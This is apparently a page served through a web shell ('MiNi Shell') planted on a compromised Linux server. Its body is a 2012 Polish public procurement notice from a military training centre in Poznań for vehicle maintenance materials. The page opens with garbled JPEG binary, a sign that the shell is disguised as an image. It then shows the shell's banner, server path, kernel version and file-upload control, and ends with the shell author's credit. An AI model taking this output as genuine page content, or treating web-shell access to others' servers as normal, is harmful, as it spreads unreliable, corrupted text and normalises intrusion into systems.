JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/61347-N-2012.html

<p class="kh_header"><b>Poznań: Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych</b><br>
<b>Numer ogłoszenia: 61347 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Szkolenia Wojsk Lądowych , ul. Wojska Polskiego 86/90, 60-628 Poznań, woj. wielkopolskie, tel. 061 8575245, faks 061 8575066.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja budżetowa- obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  dostawa: zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych
w  ilościach i asortymencie wymienionym w załączniku nr 3 do SIWZ - formularzach cenowych;
2.	Zamawiający dopuszcza składanie ofert częściowych poprzez składanie ofert na poszczególne zadania. Za ofertę częściową uważa się ofertę obejmującą pełny asortyment danego zadania. 
Liczba zadań 7:
Zadanie nr 1 - Farby, lakiery, rozpuszczalniki, kleje i  inne produkty chemiczne.
Zadanie nr 2 - Farby alkidowe i poliuretanowe specjalne (kamuflażowe).
Zadanie nr 3 - Materiały do zabezpieczenia procesu obsługowo - remontowego pojazdów                i bazy szkoleniowej.
Zadanie nr   4 - Uszczelnienia techniczne i wyroby z gumy
Zadanie nr   5 - Blachy stalowe i inne wyroby ze stali
Zadanie nr 6 - Przemysłowe (profesjonalne) produkty chemiczne do zabezpieczenia procesu obsługowo - remontowego pojazdów typu KTO Rosomak oraz innych pojazdów.
Zadanie nr 7 - Materiały i narzędzia do naprawy ogumienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.90.00.00-3, 44.80.00.00-8, 14.81.00.00-2, 31.40.00.00-0, 44.30.00.00-3, 44.40.00.00-4, 44.50.00.00-5, 19.50.00.00-1, 14.00.00.00-1, 24.90.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonana będzie na podstawie  oświadczenia złożonego przez wykonawcę wraz z ofertą, z zastosowaniem metody - spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty dotyczące przedmiotu zamówienia zawarte w części I pkt. 4 siwz. 
a)	Wykonawca składający ofertę w zadaniu nr 2 zobowiązany jest do załączenia do oferty  ważnego certyfikatu wystawionego przez upoważniony organ (tj. Wojskowy Instytut Techniki Inżynieryjnej we Wrocławiu) potwierdzający, iż oferowana farba poliuretanowa kamuflażowa w kolorze khaki (pozycja nr 6 formularza ofertowego) spełnia wymagania normy obronnej NO-80-A200:2011 Farby specjalne do malowania maskującego
b)	W przypadku zadania nr 2 Wykonawca oświadczy, że w przypadku wyboru jego oferty   przeprowadzi w ciągu 14 dni roboczych od daty podpisania umowy, praktyczne szkolenie z pracownikami Zamawiającego (w siedzibie Zamawiającego), dotyczącego sposobu stosowania dostarczonych farb.  ( wzór zał. nr 1 do siwz - formularz ofertowy ).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać:
a)	formularz oferty, stanowiący załącznik nr 1 SIWZ,
b)	formularze cenowe, stanowiący załącznik nr 3 (3/1, 3/2, 3/3, 3/4, 3/5,   
                   3/6,3/7)  do SIWZ
c)	dokument/ty potwierdzające uprawnienie do podpisania oferty                                      (w przypadku kserokopii potwierdzone za zgodność z oryginałem przez Wykonawcę )  lub pełnomocnictwa jeżeli  uprawnienia do podpisania oferty nie wynikają z załączonych dokumentów (w przypadku kserokopii potwierdzone za zgodność z oryginałem notarialnie)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży                                w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. 
2.	W takim przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy. 
3.	Zamawiający dopuszcza możliwość zwiększenia ilości towarów będących przedmiotem zamówienia (umowy) w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu:
1)	zadanie nr 1 do kwoty 3.000,00 zł brutto
2)	zadanie nr 2 do kwoty 6.000,00 zł brutto
3)	zadanie nr 3 do kwoty 6.000,00 zł brutto
4)	zadanie nr 4 do kwoty 2.500,00 zł brutto
5)	zadanie nr 5 do kwoty 5.000,00 zł brutto
6)	zadanie nr 6 do kwoty 4.000,00 zł brutto
7)	zadanie nr 7 do kwoty 2.500,00 zł brutto 
8)	okres obowiązywania zwiększenia ilości towaru w umowie ( opcji)    - od dnia zawarcia umowy do dnia 15 grudnia 2012 roku,  
9)	Zamawiający zastrzega sobie w ramach prawa opcji, zamawiania materiałów                          w codziennych zapotrzebowaniach, wynikających z jego bieżących potrzeb (dostawy sukcesywne).
10)	Wykonawca dostarczać będzie zamówiony asortyment w ciągu 72 godzin od złożenia zapotrzebowania przez Zamawiającego, transportem na własny koszt.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetarg.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Szkolenia Wojsk Lądowych ul. Wojska Polskiego 86/90, 60-628 Poznań. Sekcja Zamówień Publicznych budynek nr 17 pokój nr 6. tel (61) 8575245.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 10:00, miejsce: Centrum szkolenia Wojsk Lądowych w poznaniu ul. Wojska Polskiego 86/90. kancelaria Jawna budynek nr 18, pok 3 w dn od pon-pt w godz. 7.30-11.00 oraz 13.30-15.15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych - Zadanie nr 1 - Farby, lakiery, rozpuszczalniki, kleje i  inne produkty chemiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Farby, lakiery, rozpuszczalniki, kleje i  inne produkty chemiczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.90.00.00-3, 44.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych - Zadanie nr 2 - Farby alkidowe i poliuretanowe specjalne (kamuflażowe)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Farby alkidowe i poliuretanowe specjalne (kamuflażowe)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych - Zadanie nr 3 - Materiały do zabezpieczenia procesu obsługowo - remontowego pojazdów                i bazy szkoleniowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały do zabezpieczenia procesu obsługowo - remontowego pojazdów                i bazy szkoleniowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.81.00.00-2, 31.40.00.00-0, 44.30.00.00-3, 44.40.00.00-4, 44.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych - Zadanie nr   4 - Uszczelnienia techniczne i wyroby z gumy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uszczelnienia techniczne i wyroby z gumy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.50.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych - Zadanie nr   5 - Blachy stalowe i inne wyroby ze stali.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Blachy stalowe i inne wyroby ze stali.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.00.00.00-1, 44.40.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych  - Zadanie nr 6 - Przemysłowe (profesjonalne) produkty chemiczne do zabezpieczenia procesu obsługowo - remontowego pojazdów typu KTO Rosomak oraz innych pojazdów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przemysłowe (profesjonalne) produkty chemiczne do zabezpieczenia procesu obsługowo - remontowego pojazdów typu KTO Rosomak oraz innych pojazdów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.90.00.00-3, 44.40.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup materiałów eksploatacyjnych do zabezpieczenia procesu obsługowo - remontowego pojazdów kołowych i gąsienicowych -  Zadanie nr 7 - Materiały i narzędzia do naprawy ogumienia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały i narzędzia do naprawy ogumienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.90.00.00-3, 44.40.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com